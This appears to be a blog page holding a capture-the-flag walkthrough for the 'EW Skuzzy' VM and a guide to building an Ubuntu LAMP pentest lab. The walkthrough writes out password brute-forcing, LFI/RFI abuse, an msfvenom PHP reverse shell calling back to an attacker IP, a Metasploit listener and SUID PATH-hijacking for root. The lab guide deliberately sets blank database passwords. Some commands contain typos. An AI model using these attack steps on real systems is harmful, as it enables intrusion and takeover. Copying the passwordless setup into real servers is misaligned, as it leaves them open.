Hack the EW Skuzzy VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as EW skuzzy. The credit for making this vm machine goes to “vortexau” and it is another capture the flag where author has hidden flag for the attacker as a challenge. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.112 as network IP; now using nmap lets find out open ports.

nmap -sV 192.168.1.112

From give image you can check port 22 for SSH, 80 for TCP and 3260 for iscsi are open in target network.

We tried to connect it using ssh but didn’t find any clue, so we opened this IP in browser.

Ok now we spent some time on this site after using dirb and nikto we found some troll flags.

So we move on to the next port 3260 that is running the iscsi, ISCSI stands for Internet Small Computer Systems Interface. It is used for linking data storage facilities in a network.

You can check which targets are available by using the iscsiadm utility. Enter the following in a terminal:

iscsiadm -m discovery -t -st –p 192.168.1.112

Then we connect to the data storage

iscsiadm –m node –login

Now we check if the data storage is available.

fdisk –l

We see that 1 new storage /dev/sdb is available. Now we will mount this storage to access it.

mount /dev/sdb /root/Desktop/raj

After mounting the storage device we move into the storage and check the content of the storage.

We find our 1^st flag, we also found a disk image inside the storage we now mount this disk to check the content of the disk.

Now we move inside the disk storage we found an eml file “Toalice.eml” and an encrypted file “ToAlice.csv.enc”. We open the eml file and find our 2^nd flag.

We also find that that the encrypted file is encrypted in 256-bit encryption through the eml file.

When we decrypt the file we find that it requires a password. So first we Bruteforce the encrypted file to obtain the password.

bruteforce-salted-openssl -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 -c AES-256-CBC Toalice.csv.enc

We now have the password “supercalifragilisticoespialdoso”. We use openssl to decrypt the file.

openssl enc -d -aes256 -md sha256 -salt -in ToAlive.csv.enc -out alive -k supercalifragilisticoespialdoso

We find the 3^rd flag, we also found some random strings. We first tried to decrypt it but they weren’t encrypted in the first place. Then we found that these were actually page name.

We open these in browser, the first page gives us a site that doesn’t contain anything significant just some trolling.

The second page contains some content that looks useful.

After playing around the site we found our hint, we move to feed reader.

We open the load feed link.

Here we found our hint that there is a PHP file hiding something so we use dirb to find all the php files inside this folder.

dirb http://192.168.1.112/c2444910794e037ebd8aaf257178c90b/ -X .php

Now we find all the php files in the folder. When we open these files it gives us another hint. After taking a look at the URL we found that RFI may be possible on this site.

When we use RFI it says it requires an authentication key.

So we move to LFI, we open the PHP files using curl through LFI. We use php filter to bypass the security.

After scrolling down we found a base64 encoded string

After decoding the file we found the 4^th flag.

Now we open the other php files. After going through the files we found the next hint in “reader.php”.

We open the “reader.php” using LFI.

We again find a base64 string inside the file.

After decoding the string we found it was a php code. In the code we found our next hint, it states that the key is 47 characters long. After going through all my notes I found that flag4 was 47 characters long so we used it as the key and it worked.

Now we create a payload using msfvenom and save it as a text file.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4444 > /root/Desktop/ra.txt

After creating the file we then edit the file, we replace with ##php##.

Then we use RFI to execute the shell on the server to get the meterpreter. Also add the Key at the end of the url.

We then start the listener in metasploit.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.120

set lport 4444

exploit

Using RFI we execute the payload and got the shell

meterpreter > sysinfo

meterpreter > shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Then we find executable files on the system

find / -perm -4000 2>/dev/null

We found the file /opt/alicebackup when we execute the file we found the file contains id command.

So we copy /bin/sh into id

cp /bin/sh id

and export the path to tmp/ folder

export PATH:/tmp/$PATH

then execute the file /opt/alicebackup

Now we when we execute the file, we get the root shell. After getting the root shell we move into the /root/ folder and find the final flag.

Configure Penetration Testing Lab Setup in Ubuntu

Hello friends! Today you will learn how to configure your own web server using ubuntu inside virtual machine and install LAMP services for web server configurartion.

Let’s Begin!!

We are using VM  worksatation 12 pro for ubuntu installation, now for the guidance step by step.

Choose typical (1^st options)for configuration and click on next.

Since I have already downloaded ubuntu 14.04 of 64 bit in my windows operating system, so let browse it as shown in given image.

Click on next.

Now enter information for personalize Linux inside text filed

Full name: pentestlab

Username: raj

Passwords: 123

Confirm: 123

Then click on next.

Specify disk capacity according to your desire as 20 GB I had specified.

Choose split virtual disk into multiple file and then click on next.

Now make some changes in setting through customize hardware before you click on finish.

Change network adapter setting into Bridge and select the check box for replicate physical network connection state.

Then click on close then Finish.

This will create a new virtual machine inside your VM workstation.

Now wait for small period of time till it boot up automatically after then it will start installation which will take some time.

Now  your enter the password for login.

Now we need to install LAMP service, which is collection of open source software used to make web servers up and running. The LAMP stands for Linux, Apache, MySQL, and PHP. 

For installation user must have root privileges now type following command inside terminal to begin.

sudo bash

apt-get update

Apache HTTP Server is cross-platform, meaning that it is built for Unix-like system. Apache played a key function for the World Wide Web.

Apt-get install apache2

MySQL is the world's most popular open-source database. MySQL is simple to set up and easy to use.

Apt-get install mysql-server

You will get a prompt, Press enter to set password “blank” for root user in mysql configuration

Again press enter

phpMyAdmin is a free software tool written in PHP, proposed to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL.

Apt-get install phpmyadmin

Choose apache2 web server that will be automatically configure to run phpmyadmin.

Again a prompt will open for submit the password for phpmyadmin, to register with database server.

Press enter to left password “blank” for phpadmin.

Now in order configure phpmyadmin under Apache, you need to edit “/etc/apache2/apache2.conf” at the end of apache2.conf file. Therefore type following command to open the apache2.conf

cd etc/apache2

gedit apache2.conf

Once the file get opened type following text at the end of file as shown in given image

# phpMyAdmin Configuration

Include /etc/apache2/apache2.conf

After editing save the file.

Since we had given blank space as password for phpmyadmin therefore we need to make some changes inside its file “ configuration.inc.php” so that it could Allow No Password while login into database.

Type following command to open config.inc.php

gedit /etc/phpmyadmin/config.inc.php

Focus on highlighted comment remove double pipe (||) to activate this comment.

Now you can observe the given image is highlighting following comment:

ALLOW NO PASSWORD = TRUE

Now open myphpadmin in browser as localhost/phpmyadmin as shown in image.

Install the PHP 5 module for Apache 2 and all of its dependencies.

apt-get install php5 libapache2-mod-php5

Hence we had install LAMP services inside ubuntu therefore it will operate like as web server.

Now install some other useful services for sharing data between server and client.

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. It is a TCP protocol holds port 22 to establish communication between server and client.

Apt-get install openssh-server

Install vsftpd service, it is the default FTP server in the Ubuntu, it is also a tcp protocol hold port 21 for data transfer.

Apt-get install vsftpd

In order to ensure that above service has been installed properly in your system use nmap which will scan your system and then tell open ports and running services on your system.

To run nmap,  first install it through following command

Apt-get install nmap

Now scan your system using nmap to make sure for running services.

Nmap 127.0.0.1

From given below image you can check it has dump the result which has disclosed the running service of my system.